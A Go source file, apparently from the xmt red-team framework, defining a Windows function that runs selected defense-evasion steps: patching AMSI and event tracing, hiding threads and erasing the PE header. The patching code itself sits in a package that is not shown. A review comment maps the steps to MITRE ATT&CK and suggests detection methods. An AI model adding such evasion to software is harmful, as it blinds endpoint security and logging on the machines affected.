// Source: github.com/iDigitalFlame/xmt@v0.5.4/device/evade_windows.go

//go:build windows
// +build windows

// Copyright (C) 2020 - 2023 iDigitalFlame
//
// This program is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// any later version.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with this program.  If not, see <https://www.gnu.org/licenses/>.
//

package device

import "github.com/iDigitalFlame/xmt/device/winapi"

// Evade runs the evasion steps selected by the bitmask f.
//
// The accepted bits are the platform specific 'Evade*' flag values. Steps are
// attempted in a fixed order: EvadeWinPatchAmsi, EvadeWinPatchTrace,
// EvadeWinHideThreads, then EvadeEraseHeader. A bit that is not set skips its
// step.
//
// The first step that fails ends the run and its error is returned unchanged,
// so the caller cannot tell from the error alone which step failed. Steps that
// already succeeded are not undone here, which leaves the process partially
// modified after a failure. Nil is returned when every selected step succeeds
// or when no known bit is set.
//
// NOTE(review): the helper implementations live in the winapi package and are
// not visible in this file. Going by their names they alter in-process AMSI
// and event tracing code, hide runtime threads and wipe the PE header of the
// loaded image; confirm against winapi before relying on this. Behaviour of
// this kind is catalogued under MITRE ATT&CK T1562.001 and T1562.006. Because
// the changes are made from inside the process, detection is better served by
// telemetry the process cannot rewrite, such as kernel-side sensors and
// comparing in-memory code of loaded system DLLs with their on-disk images.
func Evade(f uint8) error {
	// Table order is the execution order and must match the flag order above.
	steps := [...]struct {
		bit   uint8
		apply func() error
	}{
		{EvadeWinPatchAmsi, winapi.PatchAmsi},
		{EvadeWinPatchTrace, winapi.PatchTracing},
		{EvadeWinHideThreads, winapi.HideGoThreads},
		{EvadeEraseHeader, winapi.ErasePEHeader},
	}
	for i := range steps {
		if f&steps[i].bit == 0 {
			continue
		}
		// Stop on the first failure; later steps are never attempted.
		if err := steps[i].apply(); err != nil {
			return err
		}
	}
	return nil
}